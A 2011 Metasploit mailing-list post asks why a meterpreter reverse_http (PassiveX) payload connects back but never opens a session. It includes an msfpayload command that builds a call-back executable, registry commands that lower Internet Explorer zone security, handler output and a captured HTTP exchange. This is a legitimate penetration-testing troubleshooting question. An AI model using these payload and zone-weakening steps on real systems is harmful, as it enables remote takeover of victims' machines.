Metasploit mailing list archives
meterpreter/reverse_http not working?
From: Sherif El-Deeb <archeldeeb () gmail com>
Date: Sun, 9 Jan 2011 13:09:07 +0300
I don't know if it's me, or something is actually wrong with the payload, after doing it "by the book", it downloads the dll, registry keys are modified, and it connects back to the PXHOST, .....then nothing... root@bt:~# msfpayload windows/meterpreter/reverse_http PXHOST=192.168.0.5 PXPORT=80 PXURI=/update X > px.exe && ...start multi/handler... nothing means: if I browsed manually to http://192.168.0.5/update , I get a white page "that has the <object> tag in it", and IE6 is done, sitting idle, also if I run the px.exe I'll end up with the invisible IEXPLORE.exe running in the process list simply doing nothing. If someone doesn't feel like reading my LONG post, the bottom line is: I got no errors, no warnings, and I believe everything is properly prepared for the payload to do its magic ... If anyone has time to confirm/point me to my mistake, it would be highly appreciated. Thanks in advance. Sherif. BEGINNING OF VERBOSE INFORMATION ================================ I tried on two different physical machines, and a VM, all with the same config "more or less": Client: XP SP3 IE6, no AV, no Firewall Checklist: %windir%\Downloaded Program Files\passivex.dll ---> true reg ADD "..\..\\ZoneMap\Ranges\randomname" /v ":Range" /d "192.168.0.5" reg ADD "..\..\\ZoneMap\Ranges\randomname" /v "*" /t REG_DWORD /d 1 reg ADD "..\..\\Zones\1" /v "1001" /t REG_DWORD /d 0 reg ADD "..\..\\Zones\1" /v "1004" /t REG_DWORD /d 0 reg ADD "..\..\\Zones\1" /v "1200" /t REG_DWORD /d 0 reg ADD "..\..\\Zones\1" /v "1201" /t REG_DWORD /d 0 reg ADD "..\..\\Zones\1" /v "1208" /t REG_DWORD /d 0 =============================== msf exploit(handler) > show options Payload options (windows/meterpreter/reverse_http): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, none, process PXAXCLSID B3AC7307-FEAE-4e43-B2D6-161E68ABA838 yes ActiveX CLSID PXAXVER -1,-1,-1,-1 yes ActiveX DLL Version PXHOST 192.168.0.5 yes The local HTTP listener hostname PXPORT 80 yes The local HTTP listener port PXURI /update no The URI root for requests msf exploit(handler) > [*] Sending PassiveX main page to client [*] Sending PassiveX main page to client [*] Sending PassiveX DLL (125952 bytes) [*] Sending PassiveX main page to client [*] Sending PassiveX DLL (125952 bytes) [*] Sending PassiveX main page to client [*] Sending PassiveX main page to client [*] Sending PassiveX main page to client ... ... The many "Sending PassiveX main page to client" are actually me trying to refresh the page, double clicking the px.exe .... to see what's happening.. =============================== FollowTcpStream GET /update HTTP/1.1 <---SNIP---> HTTP/1.1 200 OK <---SNIP---> <html> <object classid="CLSID:B3AC7307-FEAE-4e43-B2D6-161E68ABA838" codebase="/update/passivex.dll#-1,-1,-1,-1"> <param name="HttpHost" value="192.168.0.5"> <param name="HttpPort" value="80"> <param name="HttpUriBase" value="/update"> <param name="HttpSid" value="1"> <param name="DownloadSecondStage" value="1"> </object> <---SNIP---> GET /update/passivex.dll HTTP/1.1 Connection: Keep-Alive HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 125952 Server: Rex Connection: Keep-Alive MZ......................@...............................................!..L.!This program cannot be run in DOS mode. <---SNIP---> DLL downloaded,, page refreshed, and then nothing... _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- meterpreter/reverse_http not working? Sherif El-Deeb (Jan 09)